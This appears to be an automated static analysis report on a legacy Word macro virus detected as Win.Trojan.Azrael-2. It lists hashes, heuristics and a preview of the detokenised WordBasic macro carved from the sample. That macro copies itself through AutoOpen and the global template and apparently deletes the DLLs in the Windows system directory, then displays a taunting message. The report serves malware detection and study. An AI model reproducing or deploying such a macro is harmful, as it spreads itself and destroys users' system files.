Win.Trojan.Azrael-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 7bc133e6935497b7…

MALICIOUS

Office (OLE)

6.0 KB First seen: 2012-06-14
MD5: cb76e67ce0a48fa1bc0c225ce04626c8 SHA-1: 2991fe97e12096ab24ed2f5293638233f727a3ed SHA-256: 7bc133e6935497b77b8e56fa8e57af5b8624c5bead947564890786f487422b97
102 Risk Score

Malware Insights

Win.Trojan.Azrael-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro virus markers, specifically 'RSN MACRO VIRUS Goat file', and is detected by ClamAV as Win.Trojan.Azrael-2. The document body includes a string 'j(Azrael cleaned your system directory !!!' which, combined with the macro virus markers, suggests an attempt to execute malicious code, likely involving the 'c:\windows\system\*.dll' path.

Heuristics 3

  • ClamAV: Win.Trojan.Azrael-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Azrael-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 219 bytes
SHA-256: 08f217b7ce24cc6447ab1d9d9736f4f13d50a1c411d96a781a94da3d8d36931e
Preview script
First 1,000 lines of the extracted script
MAIN
, -
a$ = "autoopen"
b$ = @cmd8025 = ":" = a$
@cmd80c2 a$ , b$
@cmd80c2 b$ , a$
@cmd80f2 @cmd80f7 = 23
@cmd80ab "c:\windows\system\*.dll"
@cmd802b "Azrael cleaned your system directory !!!"
@cmd0054 = @cmd8025 , = 1